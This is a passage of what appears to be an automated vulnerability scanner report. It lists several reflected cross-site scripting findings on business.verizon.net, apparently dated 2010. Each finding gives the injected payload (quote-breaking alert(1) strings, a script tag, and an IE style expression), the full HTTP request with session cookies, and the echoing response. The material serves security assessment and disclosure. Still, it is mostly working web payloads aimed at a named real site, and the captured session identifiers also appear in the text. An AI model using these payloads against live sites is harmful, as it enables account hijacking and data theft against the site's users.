GET /SMBPortalWeb/appmanager/SMBPortal/smb39791(a)68f42e512fa?_nfpb=true&_pageLabel=SMBPortal_page_main_support&cat=Contact_Us_Default HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 81
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:04:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:04:37 GMT
Connection: close
Set-Cookie: SaasSessionID=sbyQMnLVQLSqmydG27pp2Nf8hl8rQGq8DVcYnvs8LcYYyMh9XtJs!-1644393018; path=/

Resource /SMBPortal/smb39791(a)68f42e512fa could not be resolved for locale null.

2.286. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [_pageLabel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of the _pageLabel request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68173'-alert(1)-'ec88b63ed46 was submitted in the _pageLabel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview68173'-alert(1)-'ec88b63ed46 HTTP/1.1
Host: business.verizon.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; state=; product_type=Unknown; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; hvariable=0; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; lob=consumer; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 02:24:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:24:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SaasSessionID=2rdQMnxHQgCxhM1gq2pGyQJ8zfDdQyG9qXsqLLdVZtv4TTjqCpGk!1459926814; path=/
Content-Length: 112563

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Verizon Sma
...[SNIP]...
hHeaderText");
           
       if(searchFlow != null && searchFlow == "Shop")
           searchBox = document.getElementById("searchShopHeaderText");    
       
       var f_pageDefLabel = 'SMBPortal_page_main_overview68173'-alert(1)-'ec88b63ed46';
       if (f_pageDefLabel != "SMBPortal_page_SignIn")
           searchBox.focus();
   }
   
   onload = focusIt;
   // end WR 61703
   
</script>
...[SNIP]...

2.287. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [_pageLabel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of the _pageLabel request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c958'-alert(1)-'f368f97f676 was submitted in the _pageLabel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_EmailSignIn4c958'-alert(1)-'f368f97f676&redirectUrl=SMBPortal_desktop_page_MyEmail HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:04:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:04:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SaasSessionID=VytpMnLdpbJZCYxJ3tjZdLhR2PcHx8pQDJvBPqG11nm8JBQ1Fk51!-1644393018; path=/
Content-Length: 113315

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Verizon Sma
...[SNIP]...
rchHeaderText");
           
       if(searchFlow != null && searchFlow == "Shop")
           searchBox = document.getElementById("searchShopHeaderText");    
       
       var f_pageDefLabel = 'SMBPortal_page_EmailSignIn4c958'-alert(1)-'f368f97f676';
       if (f_pageDefLabel != "SMBPortal_page_SignIn")
           searchBox.focus();
   }
   
   onload = focusIt;
   // end WR 61703
   
</script>
...[SNIP]...

2.288. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [customRedirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of the customRedirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54993"-alert(1)-"f4de118289a was submitted in the customRedirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_SignIn&customRedirect=SMBPortal_page_newsandresources_videoCenter%26Channel%3DUSA%2BBusiness%26ClipId%3DJpeb1613575%26Format%3Dflash%26Bitrate%3D300a2539%2522-alert%281%29-%2522b174114f4af%26vdoId%3D1226%26isVideoContent%3Dtrue%26portletTitle%3DVideo54993"-alert(1)-"f4de118289a HTTP/1.1
Host: business.verizon.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; CP=null*; SaasSessionID=mK0nMpGTvpnX1QLpVCLpFNXWGYv6GVWNp0zhJzmgnKhXPkK1snys!-1028272759

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Mon, 22 Nov 2010 00:14:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 22 Nov 2010 00:14:10 GMT
Connection: close
Set-Cookie: SaasSessionID=pTnmMp1RYYC2Myt10dpd7yJ7f5nVrH6ky62QVffnLGLfCPLQLL1b!-1028272759; path=/
Content-Length: 80150

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Verizon Sma
...[SNIP]...
_pageLabel=SMBPortal_page_newsandresources_videoCenter&Channel=USA+Business&ClipId=Jpeb1613575&Format=flash&Bitrate=300a2539%22-alert(1)-%22b174114f4af&vdoId=1226&isVideoContent=true&portletTitle=Video54993"-alert(1)-"f4de118289a|; path=/";
   </script>
...[SNIP]...

2.289. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [helpPagenew parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of the helpPagenew request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a332b"><script>alert(1)</script>7d70b18edcf was submitted in the helpPagenew parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_support&refId=c99986&helpPagenew=dsla332b"><script>alert(1)</script>7d70b18edcf HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:09:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:09:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SaasSessionID=6GPFMnKRKkY8QjvsCLcGHLm2T8gRknsTL8yCtc43PVzJ1F1MYQDX!-1644393018; path=/
Content-Length: 97759

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Verizon Sma
...[SNIP]...
<input type="hidden" id="pageURL" value="http://business.verizon.net:80/SMBPortalWeb/appmanager/SMBPortal/smb%3F_nfpb=true%26_pageLabel=SMBPortal_page_main_support%26refId=c99986%26helpPagenew=dsla332b"><script>alert(1)</script>7d70b18edcf"/>
...[SNIP]...

2.290. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 964b3"-alert(1)-"42f39576efd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_newsandresources_videoCenter&Channel=USA+Business&ClipId=Jpeb1609902&Format=flash&Bitrate=300&vdoId=1224&isVideoContent=true&portletTitle=Video&964b3"-alert(1)-"42f39576efd=1 HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:12:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:12:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SaasSessionID=5hhLMnKLPv4rVFhT1D1HF0zxp2THvDccS4nyXGhPczlBMmcj1P8P!-1644393018; path=/
Content-Length: 80683

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Verizon Sma
...[SNIP]...
nager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_newsandresources_videoCenter&Channel=USA+Business&ClipId=Jpeb1609902&Format=flash&Bitrate=300&vdoId=1224&isVideoContent=true&portletTitle=Video&964b3"-alert(1)-"42f39576efd=1|; path=/";
   </script>
...[SNIP]...

2.291. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2df66"><script>alert(1)</script>5c917fab90b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_support&refId=c99987&helpPagenew=fios&2df66"><script>alert(1)</script>5c917fab90b=1 HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:11:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:11:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SaasSessionID=82swMnKcBq6MQ0ZhPSMZHQ7sTqTJwhnTzppkT2XVS8GvNhN6d1v2!-1644393018; path=/
Content-Length: 97213

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Verizon Sma
...[SNIP]...
<input type="hidden" id="pageURL" value="http://business.verizon.net:80/SMBPortalWeb/appmanager/SMBPortal/smb%3F_nfpb=true%26_pageLabel=SMBPortal_page_main_support%26refId=c99987%26helpPagenew=fios%262df66"><script>alert(1)</script>5c917fab90b=1"/>
...[SNIP]...

2.292. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [pageLabel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of the pageLabel request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8a18"style%3d"x%3aexpression(alert(1))"2703a4dda8 was submitted in the pageLabel parameter. This input was echoed as b8a18"style="x:expression(alert(1))"2703a4dda8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_alerts&headLine=Free%20Wi-Fi%20Now%20Available%20for%20Verizon%20Online%20Business%20Customers&pageLabel=Overviewb8a18"style%3d"x%3aexpression(alert(1))"2703a4dda8 HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:09:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:09:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SaasSessionID=nRfCMnKFB2RjnM62JL9Q1t16nfpYDnXPbnpKjsJRjLFGwjC2GmJc!-1644393018; path=/
Content-Length: 83930

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Verizon Sma
...[SNIP]...
<a style="font-size:10pt;" href="javascript:Validatealerts('12247','Overviewb8a18"style="x:expression(alert(1))"2703a4dda8');" >
...[SNIP]...

2.293. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [portletTitle parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of the portletTitle request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26db9"-alert(1)-"cd850aad1c1 was submitted in the portletTitle parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_newsandresources_videoCenter&Channel=USA+Business&ClipId=Jpeb1609902&Format=flash&Bitrate=300&vdoId=1224&isVideoContent=true&portletTitle=Video26db9"-alert(1)-"cd850aad1c1 HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:12:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:12:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SaasSessionID=FTBZMnKC1FjX8cbVMpvM0L04MSBlJG9KQtrKT65yLMwyDgdMXTqh!-1644393018; path=/
Content-Length: 80661

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Verizon Sma
...[SNIP]...
anager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_newsandresources_videoCenter&Channel=USA+Business&ClipId=Jpeb1609902&Format=flash&Bitrate=300&vdoId=1224&isVideoContent=true&portletTitle=Video26db9"-alert(1)-"cd850aad1c1|; path=/";
   </script>
...[SNIP]...

2.294. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [redirectUrl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of the redirectUrl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbba0"-alert(1)-"dc444b6dd45 was submitted in the redirectUrl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_SignIn&redirectUrl=SMBPortal_page_main_overviewdbba0"-alert(1)-"dc444b6dd45 HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
